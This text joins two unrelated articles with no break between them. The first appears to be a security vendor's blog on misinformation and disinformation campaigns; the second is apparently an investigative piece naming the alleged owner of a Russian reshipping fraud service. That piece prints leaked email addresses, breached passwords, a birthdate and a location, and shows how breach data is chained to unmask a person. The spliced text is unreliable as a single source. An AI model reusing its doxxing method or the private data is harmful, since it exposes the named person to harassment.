The Truth Crisis | The Rising Threat of Online Misinformation and Disinformation

Access to the internet and social media platforms lies in the back pocket of nearly every user in the world. From a security point of view, one of the fastest rising concerns is how this level of connectivity is being used to spread discord and division, both quickly and across huge numbers of users.

According to the latest global survey by the United Nations, more than 85% of people are concerned about the impact of disinformation. Some 87% believe that misinformation, disinformation, and malinformation (MDM) campaigns have already left a negative impact on their country’s politics and would play a significant part in future elections.

Since the consequences of MDM extend far beyond the digital realm, threat actors including nation-states, advanced persistent threat (APT) groups, cybercriminals, and hacktivists are increasingly turning to deceptive tactics to target victims and pursue their objectives.

This blog explores the evolving threat of MDM campaigns and their role in the cyber warfare arena, exposing the strategies used by threat actors and the risks posed to organizations, businesses, and society at large.

Misinformation Campaigns | The Snowball Effect of Mistakes & Fake News

Misinformation, often stemming initially from genuine mistakes or inaccuracies, has had a long and storied history. In the last two decades alone, several notable misinformation cases have threatened public safety:

  • Iraq War and Weapons of Mass Destruction (WMD) – In 2003, faulty and exaggerated reports of Iraq’s apparent possession of weapons of mass destruction, promoted by some government officials and the media, played a significant role in catalyzing the U.S.-led invasion of Iraq. With millions of Iraqis displaced over the course of nine years and a death toll of 4500 American and 185,000 Iraqi lives, the Iraq War is still widely viewed as a foreign policy disaster.
  • Pizzagate – During the 2016 US presidential election cycle, one man’s personal email account was hacked in a spear phishing attack. After the emails were leaked, conspiracy theorists falsely claimed that they hid coded messages leading to an alleged human trafficking ring run by high-ranking Democratic party officials. After one pizzeria in Washington, D.C. was pinpointed as a trafficking establishment, an armed individual entered the pizzeria to “investigate” the claims, opening fire and threatening the employees.
  • COVID-19 Misinformation – Throughout the height of the COVID-19 pandemic, a barrage of fake news and misinformation circulated widely, impacting public health and security. Unfounded claims about the virus’s origins, treatments, and preventive measures have led to confusion, noncompliance with public health guidelines, and life-threatening consequences. Health misinformation directly contributes to the spread of disease and the cases seen during the pandemic highlighted the gaps in content checks on popular social media platforms.

Today, misinformation campaigns have evolved into a more sophisticated form, with threat actors purposefully exploiting the echo chambers of social media to propagate false information or “fake news”. The manipulation of algorithms, the use of deepfakes, and hijacking of “For You” pages (suggesting trending topics) have all contributed to an efficient spread of deceptive content.

Disinformation Campaigns | Sowing the Virtual Seeds of Discord

Disinformation campaigns work by deliberately spreading false information to deceive, manipulate, or sow discord. These campaigns target many at once, influencing elections, escalating geopolitical tensions, and creating real-world security threats. To date, state-sponsored actors, hacktivists, and criminal groups continue to conduct disinformation operations on a global scale through propaganda, political manipulation, and psychological warfare. Some notable examples include:

  • Russian Interference in U.S. Presidential Elections – During the 2016 election cycle, Russian state-sponsored actors leveraged social media to launch a multifaceted disinformation campaign to influence election outcomes and erode public confidence in the American government. This campaign raised concerns about national security and the resilience of democratic institutions against cyber threats. Foreign actors including Russia and Iran again attempted to interfere during the 2020 cycle by promoting false narratives about election fraud, aiming to undermine public trust in the democratic process.
  • Brexit and Scottish Independence Referendums – A U.S. Senate report in 2018 stated that Russia had sought to influence democracy in the United Kingdom through “disinformation, cyber hacking and corruption”, and that researchers had identified 150,000 Twitter accounts with various ties to Russia that disseminated messages about Brexit before the referendum, indicating “that the broader aim was to magnify societal discord”. In January 2023, the European Court of Human Rights sought a response from the British government to a legal claim that it had failed to properly investigate Russian interference in both the Brexit referendum and the 2014 Scottish referendum on independence. The same report said that a 2020 British Intelligence and Security Committee review had found credible evidence that Russia had tried to influence the Scottish referendum.
  • French Presidential Election – In the lead-up to the 2017 French presidential election, various state-sponsored and non-state actors launched disinformation campaigns to influence the election’s outcome. Spreading doctored tweets and emails, the actors attempted to threaten the security of the electoral process and public trust in specific electoral candidates.
  • Ongoing Disinformation in the Russia-Ukraine War – Ukraine has been a hotspot for disinformation campaigns for several years, driven largely by Russia’s efforts to shape narratives, undermine the Ukrainian government, and influence events in the region. These campaigns, which for example allege Ukrainian aggression or exploit ethnic divisions within Ukraine, are part of a broader information warfare strategy that continues to be used to exploit political and social fault lines.

Malinformation | Branching Information Warfare Into Identity-Based Attacks

Malinformation campaigns are a more recent development in information warfare. These involve the release or distribution of truthful and legitimate private information for malicious intent. Malinformation often originates from data breaches or social engineering, where sensitive personal or corporate data is stolen or leaked and then published out of context. Victims of malinformation are then usually subject to doxxing, swatting, or other means of blackmail and harassment. These campaigns also harm organizations by publishing trade secrets, confidential data, or proprietary information. Infamous examples of malinformation cases are:

  • LinkedIn Data Breach – In 2012, a massive data breach exposed the passwords of millions of LinkedIn users. Many victims experienced extortion attempts when hackers threatened to reveal their compromised LinkedIn credentials unless a ransom was paid. Four years later, reports alleging the sale of the stolen credentials on the dark web surfaced, showing how potent breaches like this can be in both the short and long run.
  • GamerGate – A controversy that began in 2014 within the gaming industry but quickly escalated into a vicious online harassment campaign. Women and marginalized communities in the gaming industry were being targeted with doxxing, swatting threats, and harassment. The campaign highlighted the dark side of online communities and the impact of malinformation on personal security.
  • Political Doxxing During the Hong Kong Protests – During the pro-democracy/anti-government protests in Hong Kong in 2019, an unprecedented wave of doxxing campaigns targeted activists as well as police officers and journalists. Individuals on both sides of the protest line saw their private information (names, photos, ages, and occupations) shared across social media apps like Telegram.

MDM Tactics Move Into the Corporate World | How to Protect Enterprises & Organizations

In 2018, tech manufacturer Broadcom Inc. received a forged memo allegedly signed by the U.S. Department of Defense, asking for a review of its upcoming $19 billion acquisition of CA Technologies by the Committee on Foreign Investment in the United States (CFIUS). CFIUS is tasked with reviewing international deals for potential security risks to the nation. Since the acquisition of CA Technologies by Broadcom involved only American companies, the review had no basis, which triggered suspicion.

Although quickly confirmed by the DoD to be fraudulent, the fake missive challenged national security measures in the public eye and caused both companies’ stocks to fall briefly. Examples like this show that the risks of MDM threats not only exist in geopolitical and social spheres, but the corporate sphere, too.

MDM threats in the corporate sector focus on causing brand and reputational damage, loss of customer trust, and both short and long-term financial losses. Disinformation-as-a-Service (DaaS) models, for example, allow malicious actors to purchase tailored MDM campaigns for their specific objectives. DaaS providers leverage a wide array of techniques, including creating and disseminating false narratives, manipulating online content, and conducting social engineering campaigns to achieve their goals.

Why Misinformation, Disinformation & Malinformation (MDM) Is a Cybersecurity Problem

MDM campaigns thrive off of connectivity and globalization to attack human perception both online and offline and have become a key component of modern information warfare. The intersection between MDM campaigns and cybersecurity can be examined across the following areas:

Terrain | Where Threat Actors Operate MDM Campaigns

While social media platforms often act as gateways and amplifiers for MDM campaigns, threat actors also leverage networking infrastructure and routing services to distribute malware, ransomware, and more to perform their malicious tasks. Disinformation and cybersecurity involve many of the same stakeholders within the private sector and the internet technical community.

Tools | Sharing the Same Methods of Attack

There is a substantial overlap between MDM and cybersecurity in terms of attack tools and methodologies. Much like cyberattack strategies, MDM campaigns take advantage of their victims’ anxieties and heightened emotions. For example, “fearware”, a subset of phishing lures that thrived during the pandemic, preys on misinformation and information gaps. Further, disinformation campaigns and cybercrime tactics both dip into the realm of illegal dark web transactions, ill-gotten data and assets, and various forms of fraud.

Incentive | The ‘Why’ Behind MDM Campaigns

Hacking, cybercrime, and influence operations offer lucrative opportunities, often outsourced to skilled threat actors or cybercrime-as-a-service infrastructures. While individuals and businesses have increased their preparedness for ransomware attacks, MDM strategies like defamation and extortion are commonly used to inflict long-term reputational harm and secure a financial gain.

Applying Cybersecurity Lessons to Combat MDM Campaigns

Implementing robust cybersecurity practices plays an important role in protecting organizations from a wide variety of threats. Cybersecurity practices are designed to identify and detect anomalies in data, network traffic, and user behavior. Advanced endpoint protection solutions can continuously monitor network traffic and identify suspicious patterns or deviations from the norm.

Ongoing monitoring is critical in the battle against MDM campaigns, particularly those feeding off public anxiety about current events. Cybersecurity teams continuously track information sources, social media channels, and online forums for signs of disinformation and misinformation. Automated tools and manual analysis help monitor the spread of false information and gauge its impact. Organizations can employ threat intelligence feeds and social listening tools to stay informed about emerging threats and campaigns.

Following cybersecurity best practices can also help to protect against harm caused by MDM campaigns. Effective best practices include implementing role-based access controls (RBAC), multi-factor authentication (MFA), encryption, and secure coding practices to safeguard information and data integrity. Cyber hygiene, such as regular software patching and updates, can also reduce any known vulnerabilities that malicious actors might exploit.

While cybersecurity best practices are essential, it is important to acknowledge that MDM campaigns are not solely a technical problem. These campaigns often involve psychological manipulation, social engineering, and the exploitation of cognitive biases. On the human side, security awareness training educates employees about the risks of falling victim to disinformation campaigns, teaching them to recognize and report suspicious activities.

Conclusion

The evolving threat of MDM campaigns continues to tighten its grip on the digital landscape, impacting geopolitical, social, and corporate spheres. Waves of these campaigns have become a common occurrence in modern cyber warfare, where information is strategically weaponized to manipulate election outcomes, disrupt critical operations, and undermine public trust.

MDM campaigns are a symptom of the dynamic nature of our digital age. In this ongoing battle, knowledge, vigilance, and proactive measures are the best defense against the rising influence of MDM tactics and their role in the realm of cyber warfare.

As businesses navigate these developing threat tactics and techniques, adopting a multi-dimensional security strategy that combines robust preventive measures with XDR capabilities becomes vital. To learn more about how SentinelOne’s Singularity XDR can help defend your organization, book a demo or contact us today.


Who’s Behind the SWAT USA Reshipping Service?

Last week, KrebsOnSecurity broke the news that one of the largest cybercrime services for laundering stolen merchandise was hacked recently, exposing its internal operations, finances and organizational structure. In today’s Part II, we’ll examine clues about the real-life identity of “Fearlless,” the nickname chosen by the proprietor of the SWAT USA Drops service.

Based in Russia, SWAT USA recruits people in the United States to reship packages containing pricey electronics that are purchased with stolen credit cards. As detailed in this Nov. 2 story, SWAT currently employs more than 1,200 U.S. residents, all of whom will be cut loose without a promised payday at the end of their first month reshipping stolen goods.

The current co-owner of SWAT, a cybercriminal who uses the nickname “Fearlless,” operates primarily on the cybercrime forum Verified. This Russian-language forum has tens of thousands of members, and it has suffered several hacks that exposed more than a decade’s worth of user data and direct messages.

January 2021 posts on Verified show that Fearlless and his partner Universalo purchased the SWAT reshipping business from a Verified member named SWAT, who’d been operating the service for years. SWAT agreed to transfer the business in exchange for 30 percent of the net profit over the ensuing six months.

Cyber intelligence firm Intel 471 says Fearlless first registered on Verified in February 2013. The email address Fearlless used on Verified leads nowhere, but a review of Fearlless’ direct messages on Verified indicates this user originally registered on Verified a year earlier as a reshipping vendor, under the alias “Apathyp.”

There are two clues supporting the conclusion that Apathyp and Fearlless are the same person. First, the Verified administrators warned Apathyp he had violated the forum’s rules barring the use of multiple accounts by the same person, and that Verified’s automated systems had detected that Apathyp and Fearlless were logging in from the same device. Second, in his earliest private messages on Verified, Fearlless told others to contact him on an instant messenger address that Apathyp had claimed as his.

Intel 471 says Apathyp registered on Verified using the email address triploo@mail.ru. A search on that email address at the breach intelligence service Constella Intelligence found that a password commonly associated with it was “niceone.” But the triploo@mail.ru account isn’t connected to much else that’s interesting except a now-deleted account at Vkontakte, the Russian answer to Facebook.

However, in Sept. 2020, Apathyp sent a private message on Verified to the owner of a stolen credit card shop, saying his credentials no longer worked. Apathyp told the proprietor that his chosen password on the service was “12Apathy.”

A search on that password at Constella reveals it was used by just four different email addresses, two of which are particularly interesting: gezze@yandex.ru and gezze@mail.ru. Constella discovered that both of these addresses were previously associated with the same password as triploo@mail.ru — “niceone,” or some variation thereof.

Constella found that years ago gezze@mail.ru was used to create a Vkontakte account under the name Ivan Sherban (former password: “12niceone”) from Magnitogorsk, an industrial city in the southern region of Russia. That same email address is now tied to a Vkontakte account for an Ivan Sherban who lists his home as Saint Petersburg, Russia. Sherban’s profile photo shows a heavily tattooed, muscular and recently married individual with his beautiful new bride getting ready to drive off in a convertible sports car.

A pivotal clue for validating the research into Apathyp/Fearlless came from the identity intelligence firm myNetWatchman, which found that gezze@mail.ru at one time used the passwords “геззи1991” (gezze1991) and “gezze18081991.”

Care to place a wager on when Vkontakte says Mr. Sherban’s birthday is? Ten points if you answered August 18 (18081991).

Mr. Sherban did not respond to multiple requests for comment.